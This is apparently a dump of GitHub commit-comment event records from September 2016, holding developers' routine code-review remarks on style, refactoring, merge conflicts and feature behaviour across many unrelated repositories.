{"id":"4639872873","type":"CommitCommentEvent","actor":{"login":"netlooker"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19231139,"position":163,"line":631,"path":"profiles/common/modules/custom/tmgmt_poetry/plugins/tmgmt_poetry.plugin.inc","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T20:50:11Z","updated_at":"2016-09-29T20:50:11Z","body":"https://github.com/ec-europa/platform-dev/blob/master/profiles/common/modules/custom/tmgmt_poetry/README.md#enabling-the-feature-on-your-platform-instance\r\nThis should put some more light on how this feature is delivered. "}},"created_at":"2016-09-29T20:50:11Z"}
{"id":"4639875697","type":"CommitCommentEvent","actor":{"login":"joseph-roque"},"repo":{"name":"joenot443/infinitereddit"},"payload":{"comment":{"id":19231149,"position":null,"line":null,"path":null,"commit_id":"7de66a613de7cdd9e4dfb051ab5e7aad468acbf1","created_at":"2016-09-29T20:50:38Z","updated_at":"2016-09-29T20:50:38Z","body":"why the fuck would you add these back"}},"created_at":"2016-09-29T20:50:38Z"}
{"id":"4639877355","type":"CommitCommentEvent","actor":{"login":"CarsonF"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19231158,"position":null,"line":null,"path":null,"commit_id":"9450521988a84b5f30af89255d98e7e9648a993a","created_at":"2016-09-29T20:50:56Z","updated_at":"2016-09-29T20:50:56Z","body":"Well absolute paths were both returned from server (ajax call), and given to JS. So it only hides it from those who are not looking.\r\n\r\nI'm still not sure if this is correct btw. Maybe using the `root` path from RM wouldn't be bad here. I think that makes sense for these limited use cases...."}},"created_at":"2016-09-29T20:50:56Z"}
{"id":"4639881120","type":"CommitCommentEvent","actor":{"login":"waymondo"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":19231169,"position":null,"line":null,"path":null,"commit_id":"4273e837bdc60d831012838d398f95c28d6ef311","created_at":"2016-09-29T20:51:36Z","updated_at":"2016-09-29T20:51:36Z","body":"Oh nice, thanks for the info. Works after updating. Thanks!"}},"created_at":"2016-09-29T20:51:36Z"}
{"id":"4639882371","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19231172,"position":null,"line":null,"path":null,"commit_id":"ae3e44a7092bf122fa29a61fbce92a35dafde60f","created_at":"2016-09-29T20:51:49Z","updated_at":"2016-09-29T20:51:49Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#aDU9hfoXS9iw26qKwlzOvQ"}},"created_at":"2016-09-29T20:51:49Z"}
{"id":"4639884807","type":"CommitCommentEvent","actor":{"login":"CarsonF"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19231175,"position":30,"line":51,"path":"app/view/twig/_base/_page.twig","commit_id":"f2596fe697c9e2af551a81e6d9d19f05e014b5af","created_at":"2016-09-29T20:52:14Z","updated_at":"2016-09-29T20:52:14Z","body":"Ha yeah. Still hate that all this is here, but at least getting it off of `RM` and `file_exists` is a step forward."}},"created_at":"2016-09-29T20:52:14Z"}
{"id":"4639885296","type":"CommitCommentEvent","actor":{"login":"bogdal"},"repo":{"name":"bogdal/sentry-youtrack"},"payload":{"comment":{"id":19231176,"position":4,"line":52,"path":"sentry_youtrack/youtrack.py","commit_id":"651ebfe8fd48e0fb3c16caab0e5643a0ce189ff7","created_at":"2016-09-29T20:52:20Z","updated_at":"2016-09-29T20:52:20Z","body":"Yes, I'm aware of this message. We don't want to display low-level information here. Regardless of the reason I'm not able to connect to the valid YouTrack instance, hence I think this error message fits here."}},"created_at":"2016-09-29T20:52:20Z"}
{"id":"4639886337","type":"CommitCommentEvent","actor":{"login":"iqbal-lab"},"repo":{"name":"rmnorris/pandora"},"payload":{"comment":{"id":19231178,"position":null,"line":null,"path":null,"commit_id":"93f0737e82b8b6f1df13eb8d30f123ad0eeb10a3","created_at":"2016-09-29T20:52:31Z","updated_at":"2016-09-29T20:52:31Z","body":"Yes, but means all your constructors/destructors are working. Just nice confirmation"}},"created_at":"2016-09-29T20:52:31Z"}
{"id":"4639888341","type":"CommitCommentEvent","actor":{"login":"Deadpool37"},"repo":{"name":"Deadpool37/FreeCodeCamp"},"payload":{"comment":{"id":19231180,"position":4,"line":28,"path":"seed/challenges/01-front-end-development-certification/html5-and-css.json","commit_id":"8ed74570eaca2db6a8076fcc65de1b164628a14b","created_at":"2016-09-29T20:52:52Z","updated_at":"2016-09-29T20:52:52Z","body":"Removed ') "}},"created_at":"2016-09-29T20:52:52Z"}
{"id":"4639894694","type":"CommitCommentEvent","actor":{"login":"CarsonF"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19231196,"position":17,"line":57,"path":"src/Provider/FilesystemServiceProvider.php","commit_id":"914c6aa6fea4c861329e72326b4fab7b3ec6e913","created_at":"2016-09-29T20:53:56Z","updated_at":"2016-09-29T20:53:56Z","body":"Hmm not sure. What would that handle? I guess that would handle `files/2016-01/foo.jpg`... interesting... right now I just strip `files/` from beginning of path, but maybe that makes more sense..."}},"created_at":"2016-09-29T20:53:56Z"}
{"id":"4639897849","type":"CommitCommentEvent","actor":{"login":"Alphadestrious"},"repo":{"name":"neobuddy89/android_device_moto_shamu"},"payload":{"comment":{"id":19231206,"position":null,"line":null,"path":null,"commit_id":"209cdec90f77ac7d21f585456ac97b30662aba83","created_at":"2016-09-29T20:54:29Z","updated_at":"2016-09-29T20:54:29Z","body":"I see. So this \"compress offload features\" is to offload from the host applications processor correct? "}},"created_at":"2016-09-29T20:54:29Z"}
{"id":"4639902374","type":"CommitCommentEvent","actor":{"login":"CarsonF"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19231218,"position":null,"line":null,"path":null,"commit_id":"914c6aa6fea4c861329e72326b4fab7b3ec6e913","created_at":"2016-09-29T20:55:16Z","updated_at":"2016-09-29T20:55:16Z","body":"I'm wondering it makes sense to be able to pass in mount points to check to each method (optionally) that would override defaults for class. That way we don't have to create a new object to check different filesystems....See ThumbnailSP."}},"created_at":"2016-09-29T20:55:16Z"}
{"id":"4639912156","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19231297,"position":null,"line":null,"path":null,"commit_id":"18d4ada6f5c97e8eb2c138d458ec2854fd99044a","created_at":"2016-09-29T20:57:00Z","updated_at":"2016-09-29T20:57:00Z","body":"WFM"}},"created_at":"2016-09-29T20:57:00Z"}
{"id":"4639912873","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"neobuddy89/android_device_moto_shamu"},"payload":{"comment":{"id":19231306,"position":null,"line":null,"path":null,"commit_id":"209cdec90f77ac7d21f585456ac97b30662aba83","created_at":"2016-09-29T20:57:08Z","updated_at":"2016-09-29T20:57:08Z","body":"Compress offload features are for various music formats to reduce CPU load without quality loss.\r\nBefore enabling these in device tree, kernel changes are required for shamu.\r\nNewer devices readily support it."}},"created_at":"2016-09-29T20:57:08Z"}
{"id":"4639915809","type":"CommitCommentEvent","actor":{"login":"tatarbj"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19231317,"position":163,"line":631,"path":"profiles/common/modules/custom/tmgmt_poetry/plugins/tmgmt_poetry.plugin.inc","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T20:57:40Z","updated_at":"2016-09-29T20:57:40Z","body":"'can throw warning' means Robert there is the possibility based on the code (even the setting is set up or not) it could throw a warning, there is a good practice like a habit to always set the second parameter because the default value of it is NULL (https://api.drupal.org/api/drupal/includes%21bootstrap.inc/function/variable_get/7.x) what will brake your code in this specific case when you count with the 'fact' it has the 'callback_user' item. Programmatically it can throw warning, even you don't count with this case :)"}},"created_at":"2016-09-29T20:57:40Z"}
{"id":"4639916139","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"noeladd/ResourceDot"},"payload":{"comment":{"id":19231320,"position":8,"line":17,"path":"server/app/routes/tags/index.js","commit_id":"af35aabd8f9a9d52917ca672bc1999875c9f41d0","created_at":"2016-09-29T20:57:43Z","updated_at":"2016-09-29T20:57:43Z","body":"@ingridcronburg looks like there were some more conflicts that needed hand-tuning."}},"created_at":"2016-09-29T20:57:43Z"}
{"id":"4639916981","type":"CommitCommentEvent","actor":{"login":"Atcold"},"repo":{"name":"clementfarabet/lua---camera"},"payload":{"comment":{"id":19231323,"position":4,"line":6,"path":"CMakeLists.txt","commit_id":"834e43ca3c5f35d080413e8e642d7e5c5fb1a0a3","created_at":"2016-09-29T20:57:52Z","updated_at":"2016-09-29T20:57:52Z","body":"This instruction breaks installation on system that do not have `opencv` installed."}},"created_at":"2016-09-29T20:57:52Z"}
{"id":"4639920442","type":"CommitCommentEvent","actor":{"login":"bendlas"},"repo":{"name":"darwin/clojurescript"},"payload":{"comment":{"id":19231334,"position":38,"line":195,"path":"src/main/cljs/clojure/browser/repl.cljs","commit_id":"b7bc7377ca6ea2671629d561df741e0436fc03c9","created_at":"2016-09-29T20:58:28Z","updated_at":"2016-09-29T20:58:28Z","body":"Should `*bootstraped?* be set unconditionally in `bootstrap!`?"}},"created_at":"2016-09-29T20:58:28Z"}
{"id":"4639928299","type":"CommitCommentEvent","actor":{"login":"f3rnando"},"repo":{"name":"steemit-intl/steemit.com"},"payload":{"comment":{"id":19231354,"position":null,"line":null,"path":null,"commit_id":"6c85a80357a23a71b4177bc0afe027ef0b74f15d","created_at":"2016-09-29T20:59:50Z","updated_at":"2016-09-29T20:59:50Z","body":"@mynameiskeo @skzap As of now, App.jsx is the only controller that is being translated. If you wish, we may wrap every other string with translate() function in order to make it work on the whole site. We should rebase or pull > merge the latest master. Shall we coordinate a chat meeting to arrange the details? Im touring Caribe right now, so we should coordinate to avoid missing each other. Im in CST, I propose a chat meeting at 6PM CST. Im pasting this message in the chat as well."}},"created_at":"2016-09-29T20:59:50Z"}
{"id":"4639932107","type":"CommitCommentEvent","actor":{"login":"tatarbj"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19231364,"position":175,"line":643,"path":"profiles/common/modules/custom/tmgmt_poetry/plugins/tmgmt_poetry.plugin.inc","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T21:00:27Z","updated_at":"2016-09-29T21:00:27Z","body":"this +1 month repeats in tmgmt_poetry.module:642, it would be a great improvement if you could organise this parameter in a drupal variable or a constant just to make sure you don't miss any occurrence if business need changes it. "}},"created_at":"2016-09-29T21:00:27Z"}
{"id":"4639936922","type":"CommitCommentEvent","actor":{"login":"tatarbj"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19231381,"position":175,"line":643,"path":"profiles/common/modules/custom/tmgmt_poetry/plugins/tmgmt_poetry.plugin.inc","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T21:01:16Z","updated_at":"2016-09-29T21:01:16Z","body":"maybe somewhere else as well, the whole project should be checked here and look for possible refactorable parameters."}},"created_at":"2016-09-29T21:01:16Z"}
{"id":"4639940092","type":"CommitCommentEvent","actor":{"login":"CarsonF"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19231396,"position":null,"line":null,"path":null,"commit_id":"a79cd3509469fcdf52472ed0883c52b4117bda4f","created_at":"2016-09-29T21:01:50Z","updated_at":"2016-09-29T21:01:50Z","body":"Yeah I was really fuzzy about this. `dump` is fine if the paths are pre-generated. I mean as long as they come from url generator some how, they don't have to generate it themselves. "}},"created_at":"2016-09-29T21:01:50Z"}
{"id":"4639941341","type":"CommitCommentEvent","actor":{"login":"teschnei"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":19231397,"position":null,"line":null,"path":null,"commit_id":"894def07d56bc451be8dde5cae313e76290c7bc0","created_at":"2016-09-29T21:02:04Z","updated_at":"2016-09-29T21:02:04Z","body":"dying and resetting a force popped NM doesn't re-roll the weaknesses"}},"created_at":"2016-09-29T21:02:04Z"}
{"id":"4639942291","type":"CommitCommentEvent","actor":{"login":"wldcordeiro"},"repo":{"name":"devtools-html/debugger.html"},"payload":{"comment":{"id":19231400,"position":5,"line":4,"path":"public/js/lib/devtools/shared/transport/websocket-transport.js","commit_id":"48d5cc3233f469de4f0bfc8bb3a8b36500b7a881","created_at":"2016-09-29T21:02:13Z","updated_at":"2016-09-29T21:02:13Z","body":"😆 "}},"created_at":"2016-09-29T21:02:13Z"}
{"id":"4639944163","type":"CommitCommentEvent","actor":{"login":"TheCycoONE"},"repo":{"name":"CorsixTH/CorsixTH"},"payload":{"comment":{"id":19231405,"position":9,"line":0,"path":"CorsixTH/Lua/dialogs/edit_room.lua","commit_id":"4bbc52bd48e2055adc5a9583022ed29684a1ab2e","created_at":"2016-09-29T21:02:32Z","updated_at":"2016-09-29T21:02:32Z","body":"I think this should be a local function? Just need to pass the door type."}},"created_at":"2016-09-29T21:02:32Z"}
{"id":"4639944726","type":"CommitCommentEvent","actor":{"login":"modocache"},"repo":{"name":"SwiftWeekly/swiftweekly.github.io"},"payload":{"comment":{"id":19231408,"position":null,"line":null,"path":null,"commit_id":"a168cf8633e1390eb5a5984ed04e6a786f0ffda4","created_at":"2016-09-29T21:02:39Z","updated_at":"2016-09-29T21:02:39Z","body":"Wow, this was scary. I used the GitHub web interface and must have lost focus on the text field, thus causing some combination of `]` and space to post a commit. 😨 "}},"created_at":"2016-09-29T21:02:39Z"}
{"id":"4639945342","type":"CommitCommentEvent","actor":{"login":"HughMcDonnell"},"repo":{"name":"filipay/monitroom"},"payload":{"comment":{"id":19231410,"position":null,"line":null,"path":null,"commit_id":"30f322b69ea14c6e4388c5be2d2dbb4d639f47f6","created_at":"2016-09-29T21:02:45Z","updated_at":"2016-09-29T21:02:45Z","body":"cool commit bro"}},"created_at":"2016-09-29T21:02:45Z"}
{"id":"4639947107","type":"CommitCommentEvent","actor":{"login":"mef"},"repo":{"name":"Mango-information-systems/twitto_be"},"payload":{"comment":{"id":19231415,"position":12,"line":120,"path":"model/tweets.js","commit_id":"4fc3c0d84e590698b0eeafb7db428b65d976aedd","created_at":"2016-09-29T21:03:03Z","updated_at":"2016-09-29T21:03:03Z","body":"> // Why does the following not work?\r\n\r\nWell, it seems to me like it's working. However, you may prefer to use `typeof` rather than `hasOwnProperty`, for performance and also for the code to work when we use inheritance.\r\n\r\ncf. :\r\n* http://www.esya.me/posts/typeof-vs-hasownproperty/\r\n* http://andrew.hedges.name/experiments/in/\r\n* http://stackoverflow.com/questions/26461135/javascript-hasownproperty-vs-typeof\r\n\r\nPlus (unrelated), it would be good if you named the variables with full words rather than one letter: tweet, mention, hashtag rather than t, m, h."}},"created_at":"2016-09-29T21:03:03Z"}
{"id":"4639952891","type":"CommitCommentEvent","actor":{"login":"netlooker"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19231435,"position":175,"line":643,"path":"profiles/common/modules/custom/tmgmt_poetry/plugins/tmgmt_poetry.plugin.inc","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T21:04:04Z","updated_at":"2016-09-29T21:04:04Z","body":"We are before refactoring of whole tmgmt_poetry but firstly we want to cover current requested functionalities. So indeed there is redundancy of the code."}},"created_at":"2016-09-29T21:04:04Z"}
{"id":"4639963433","type":"CommitCommentEvent","actor":{"login":"tatarbj"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19231468,"position":175,"line":643,"path":"profiles/common/modules/custom/tmgmt_poetry/plugins/tmgmt_poetry.plugin.inc","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T21:05:57Z","updated_at":"2016-09-29T21:05:57Z","body":"but it means you don't need to make your added code less redundant? :)"}},"created_at":"2016-09-29T21:05:57Z"}
{"id":"4639967272","type":"CommitCommentEvent","actor":{"login":"Alphadestrious"},"repo":{"name":"neobuddy89/android_device_moto_shamu"},"payload":{"comment":{"id":19231483,"position":null,"line":null,"path":null,"commit_id":"209cdec90f77ac7d21f585456ac97b30662aba83","created_at":"2016-09-29T21:06:41Z","updated_at":"2016-09-29T21:06:41Z","body":"Makes sense. Thanks for the information!"}},"created_at":"2016-09-29T21:06:41Z"}
{"id":"4639968722","type":"CommitCommentEvent","actor":{"login":"darwin"},"repo":{"name":"darwin/clojurescript"},"payload":{"comment":{"id":19231487,"position":38,"line":195,"path":"src/main/cljs/clojure/browser/repl.cljs","commit_id":"b7bc7377ca6ea2671629d561df741e0436fc03c9","created_at":"2016-09-29T21:06:56Z","updated_at":"2016-09-29T21:06:56Z","body":"thanks, probably a better idea, see all branch commits:\r\nhttps://github.com/clojure/clojurescript/compare/master...darwin:async-bootstrap"}},"created_at":"2016-09-29T21:06:56Z"}
{"id":"4639969821","type":"CommitCommentEvent","actor":{"login":"dolmen"},"repo":{"name":"hatifnatt/liquidprompt"},"payload":{"comment":{"id":19231491,"position":null,"line":null,"path":null,"commit_id":"a398b4c339c040fcd63e1f9874dc634cdd9f9777","created_at":"2016-09-29T21:07:07Z","updated_at":"2016-09-29T21:07:07Z","body":"Don't merge from nojhan/master. Instead you should rebase your master on nojhan/master."}},"created_at":"2016-09-29T21:07:07Z"}
{"id":"4639973162","type":"CommitCommentEvent","actor":{"login":"gchudnov"},"repo":{"name":"gchudnov/RxCpp"},"payload":{"comment":{"id":19231500,"position":47,"line":191,"path":"Rx/v2/test/operators/debounce.cpp","commit_id":"5330a34c6503822199b432ca6ec5fa45205af07b","created_at":"2016-09-29T21:07:43Z","updated_at":"2016-09-29T21:07:43Z","body":"Agreed, I'll do it."}},"created_at":"2016-09-29T21:07:43Z"}
{"id":"4639975056","type":"CommitCommentEvent","actor":{"login":"bendlas"},"repo":{"name":"darwin/clojurescript"},"payload":{"comment":{"id":19231507,"position":54,"line":211,"path":"src/main/cljs/clojure/browser/repl.cljs","commit_id":"b7bc7377ca6ea2671629d561df741e0436fc03c9","created_at":"2016-09-29T21:08:03Z","updated_at":"2016-09-29T21:08:03Z","body":"`onreadystatechange` isn't cancelable, but there are some cross-browser issues, so I think using a poll loop is fine here.\r\n\r\nhttps://developer.mozilla.org/en-US/docs/Web/Events/readystatechange"}},"created_at":"2016-09-29T21:08:03Z"}
{"id":"4639978956","type":"CommitCommentEvent","actor":{"login":"loosebazooka"},"repo":{"name":"GoogleCloudPlatform/app-gradle-plugin"},"payload":{"comment":{"id":19231524,"position":null,"line":null,"path":null,"commit_id":"ba5122c342bcb50f1f8779ff0e6ab195b977353a","created_at":"2016-09-29T21:08:44Z","updated_at":"2016-09-29T21:08:44Z","body":"@meltsufin "}},"created_at":"2016-09-29T21:08:44Z"}
{"id":"4639979832","type":"CommitCommentEvent","actor":{"login":"youle31"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19231529,"position":14,"line":110,"path":"source/gameengine/Rasterizer/RAS_CubeMap.cpp","commit_id":"015e7e2636223bd6ddc4892f68dfe1ae9b581bcf","created_at":"2016-09-29T21:08:54Z","updated_at":"2016-09-29T21:08:54Z","body":"It's to fix a crash with cubemaps: https://github.com/UPBGE/blender/issues/234"}},"created_at":"2016-09-29T21:08:54Z"}
{"id":"4639982319","type":"CommitCommentEvent","actor":{"login":"j5ok5er"},"repo":{"name":"chinoogawa/instaBrute"},"payload":{"comment":{"id":19231532,"position":null,"line":null,"path":null,"commit_id":"da7be2e44a23176cf8c34d4263b8264f4bc4175b","created_at":"2016-09-29T21:09:20Z","updated_at":"2016-09-29T21:09:20Z","body":"good"}},"created_at":"2016-09-29T21:09:20Z"}
{"id":"4639982958","type":"CommitCommentEvent","actor":{"login":"meltsufin"},"repo":{"name":"GoogleCloudPlatform/app-gradle-plugin"},"payload":{"comment":{"id":19231534,"position":null,"line":null,"path":null,"commit_id":"ba5122c342bcb50f1f8779ff0e6ab195b977353a","created_at":"2016-09-29T21:09:26Z","updated_at":"2016-09-29T21:09:26Z","body":":boat: "}},"created_at":"2016-09-29T21:09:26Z"}
{"id":"4639983822","type":"CommitCommentEvent","actor":{"login":"fbiville"},"repo":{"name":"fpavageau/liquigraph"},"payload":{"comment":{"id":19231537,"position":9,"line":67,"path":"latest/index.html","commit_id":"24e0eebca53f48452bfe387db78b163c7e003459","created_at":"2016-09-29T21:09:35Z","updated_at":"2016-09-29T21:09:35Z","body":"I wonder if it works with the default password. It could be worth checking and adding another note regarding if necessary."}},"created_at":"2016-09-29T21:09:35Z"}
{"id":"4639984785","type":"CommitCommentEvent","actor":{"login":"tatarbj"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19231542,"position":41,"line":278,"path":"profiles/common/modules/custom/tmgmt_workbench/tmgmt_workbench.module","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T21:09:46Z","updated_at":"2016-09-29T21:09:46Z","body":"empty line could be removed."}},"created_at":"2016-09-29T21:09:46Z"}
{"id":"4639984801","type":"CommitCommentEvent","actor":{"login":"netlooker"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19231543,"position":175,"line":643,"path":"profiles/common/modules/custom/tmgmt_poetry/plugins/tmgmt_poetry.plugin.inc","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T21:09:46Z","updated_at":"2016-09-29T21:09:46Z","body":"This PR is not completed. As TDD methodology drives me to reach the goal and pass the Behat test on first iteration I'm trying to make it work. After that I'm tweaking to make it more beautiful. So if you want to perform QAs I can suggest to check the 'Ready for QA' or 'QA in progress' columns on our board. "}},"created_at":"2016-09-29T21:09:46Z"}
{"id":"4639985845","type":"CommitCommentEvent","actor":{"login":"fbiville"},"repo":{"name":"fpavageau/liquigraph"},"payload":{"comment":{"id":19231546,"position":18,"line":98,"path":"latest/index.html","commit_id":"24e0eebca53f48452bfe387db78b163c7e003459","created_at":"2016-09-29T21:09:59Z","updated_at":"2016-09-29T21:09:59Z","body":"Maybe explain what a dry run is?"}},"created_at":"2016-09-29T21:09:59Z"}
{"id":"4639986535","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"aleksposte/Thinknetica-ror-basic"},"payload":{"comment":{"id":19231548,"position":4,"line":4,"path":"Lesson_8/var.rb","commit_id":"5ec10299df05ed458b660d81c0943d6ade658a3c","created_at":"2016-09-29T21:10:07Z","updated_at":"2016-09-29T21:10:07Z","body":"Обычно просто пишут `_` если в блоке не используют ключ или значение. Есть ещё метод: `each_key` и `each_value`."}},"created_at":"2016-09-29T21:10:07Z"}
{"id":"4639988310","type":"CommitCommentEvent","actor":{"login":"episodeyang"},"repo":{"name":"SchusterLab/M017_Yggdrasil"},"payload":{"comment":{"id":19231557,"position":null,"line":null,"path":null,"commit_id":"bcd9451a5c219bf66bb3585294427f2dc7322240","created_at":"2016-09-29T21:10:27Z","updated_at":"2016-09-29T21:10:27Z","body":"<img width=\"866\" alt=\"screenshot 2016-09-29 16 05 31\" src=\"https://cloud.githubusercontent.com/assets/630490/18972552/3b0f36e8-865f-11e6-895b-3f60b3a712e8.png\">\r\n"}},"created_at":"2016-09-29T21:10:27Z"}
{"id":"4639990351","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19231563,"position":71,"line":101,"path":"ALGORYTHMS/task1/queue.cpp","commit_id":"9c2c780e7ed25855121482024975bc7d49b5bbf2","created_at":"2016-09-29T21:10:51Z","updated_at":"2016-09-29T21:10:51Z","body":"Typo: s/;;/;/"}},"created_at":"2016-09-29T21:10:51Z"}
{"id":"4639991076","type":"CommitCommentEvent","actor":{"login":"andy-slac"},"repo":{"name":"lsst/qserv"},"payload":{"comment":{"id":19231564,"position":7,"line":44,"path":"core/modules/util/Command.h","commit_id":"411c79fe333c3e8376526b3a4cf195a6ab8a7be8","created_at":"2016-09-29T21:10:59Z","updated_at":"2016-09-29T21:10:59Z","body":"Semicolon is not needed on these two lines"}},"created_at":"2016-09-29T21:10:59Z"}
{"id":"4639997024","type":"CommitCommentEvent","actor":{"login":"AlexandrShcherbakov"},"repo":{"name":"AlexandrShcherbakov/Demo4"},"payload":{"comment":{"id":19231576,"position":null,"line":null,"path":null,"commit_id":"8149b3b4340aa04bc27a1a4dc19594b3810f48b4","created_at":"2016-09-29T21:12:04Z","updated_at":"2016-09-29T21:12:04Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Еженедельные отчёты](https://trello.com/c/YO6jUfoq/82--)"}},"created_at":"2016-09-29T21:12:04Z"}
{"id":"4639997238","type":"CommitCommentEvent","actor":{"login":"TeoTwawki"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":19231577,"position":null,"line":null,"path":null,"commit_id":"894def07d56bc451be8dde5cae313e76290c7bc0","created_at":"2016-09-29T21:12:07Z","updated_at":"2016-09-29T21:12:07Z","body":"You are certain thats how it works? Neither wiki mentions it. The closest they come is a generic mention of the day check being done when it \"becomes active\".  Don't suppose it matters much. Glad the reason wasn't engage not firing on stuff spawned claimed or something (that would have been a problem elsewhere)."}},"created_at":"2016-09-29T21:12:07Z"}
{"id":"4639998046","type":"CommitCommentEvent","actor":{"login":"noeladd"},"repo":{"name":"noeladd/ResourceDot"},"payload":{"comment":{"id":19231578,"position":8,"line":17,"path":"server/app/routes/tags/index.js","commit_id":"af35aabd8f9a9d52917ca672bc1999875c9f41d0","created_at":"2016-09-29T21:12:16Z","updated_at":"2016-09-29T21:12:16Z","body":"Thanks for the heads up.  Fixing the conflict markers now."}},"created_at":"2016-09-29T21:12:16Z"}
{"id":"4640000719","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19231585,"position":34,"line":64,"path":"ALGORYTHMS/task1/queue.cpp","commit_id":"9c2c780e7ed25855121482024975bc7d49b5bbf2","created_at":"2016-09-29T21:12:47Z","updated_at":"2016-09-29T21:12:47Z","body":"Интереснее с помощью рандома выбирать операцию – вставлять ли или извлекать из очереди.\r\nА значения можно, и даже лучше, брать уникальные. Например, просто возрастающую последовательность чисел."}},"created_at":"2016-09-29T21:12:47Z"}
{"id":"4640005388","type":"CommitCommentEvent","actor":{"login":"hartshorne"},"repo":{"name":"emersion/go-imap-unselect"},"payload":{"comment":{"id":19231604,"position":null,"line":null,"path":null,"commit_id":"aa60121443b21be15d45a92106de5188f9f4754d","created_at":"2016-09-29T21:13:37Z","updated_at":"2016-09-29T21:13:37Z","body":"thanks, beat me to it"}},"created_at":"2016-09-29T21:13:37Z"}
{"id":"4640005934","type":"CommitCommentEvent","actor":{"login":"jensens"},"repo":{"name":"plone/plone.cachepurging"},"payload":{"comment":{"id":19231606,"position":24,"line":237,"path":"plone/cachepurging/tests/test_utils.py","commit_id":"a0604973a04802b8a0d618f2f49ae43f207f0000","created_at":"2016-09-29T21:13:41Z","updated_at":"2016-09-29T21:13:41Z","body":"I think I changed all adapts to adapter, this one sneaked back in right?"}},"created_at":"2016-09-29T21:13:41Z"}
{"id":"4640005993","type":"CommitCommentEvent","actor":{"login":"noeladd"},"repo":{"name":"noeladd/ResourceDot"},"payload":{"comment":{"id":19231607,"position":null,"line":null,"path":null,"commit_id":"07d9a9f7b83173478d6561dceb49b33c4ebdc266","created_at":"2016-09-29T21:13:42Z","updated_at":"2016-09-29T21:13:42Z","body":"@glebec Conflict markers fixed!\r\n"}},"created_at":"2016-09-29T21:13:42Z"}
{"id":"4640008618","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19231611,"position":6,"line":6,"path":"ALGORYTHMS/task1/myqueue.h","commit_id":"9c2c780e7ed25855121482024975bc7d49b5bbf2","created_at":"2016-09-29T21:14:09Z","updated_at":"2016-09-29T21:14:09Z","body":"Style: **my**queue, а stack без my."}},"created_at":"2016-09-29T21:14:09Z"}
{"id":"4640012003","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19231619,"position":5,"line":507,"path":"2016-02/content/Raza.tex","commit_id":"cb34dba58edbb67049627baa8b7913a4d09e6e97","created_at":"2016-09-29T21:14:48Z","updated_at":"2016-09-29T21:14:48Z","body":"Ah"}},"created_at":"2016-09-29T21:14:48Z"}
{"id":"4640014402","type":"CommitCommentEvent","actor":{"login":"BlitzErik"},"repo":{"name":"BrentOzarULTD/SQL-Server-First-Responder-Kit"},"payload":{"comment":{"id":19231623,"position":null,"line":null,"path":null,"commit_id":"e265a8de62c4341a8f70bc8a10f45c171de69d26","created_at":"2016-09-29T21:15:15Z","updated_at":"2016-09-29T21:15:15Z","body":"Sorry if this messed anything up for anyone. The GitShell is a confusing place for someone who spends most of his day writing SELECT FROM. "}},"created_at":"2016-09-29T21:15:15Z"}
{"id":"4640016436","type":"CommitCommentEvent","actor":{"login":"ramayah"},"repo":{"name":"CSE-CSUSB/Constitution"},"payload":{"comment":{"id":19231628,"position":null,"line":null,"path":null,"commit_id":"a24f174f57cce96fcb0ef5c92f5890417f5b049f","created_at":"2016-09-29T21:15:38Z","updated_at":"2016-09-29T21:15:38Z","body":"Thanks for looking out for us Mike! I'll be sure to put it to use.\n\nSean Ramayah Hamilton\nramayah478@gmail.com\n951-834-5164\n\nOn Wed, Sep 28, 2016 at 7:32 PM, Mike Korcha <notifications@github.com>\nwrote:\n\n> Hey,\n>\n> So typically you'd be editing the constitution.md and bylaws.md files in\n> there instead of just committing a pre-built file. It helps keep track of\n> versioning and changes between versions of the files. Plus, just editing\n> the markdown files makes it much easier to just read on Github.\n>\n> The README has instructions on how to use the scripts we have to make\n> these files in any format we want.\n>\n> Just thought I'd let you know! :)\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> 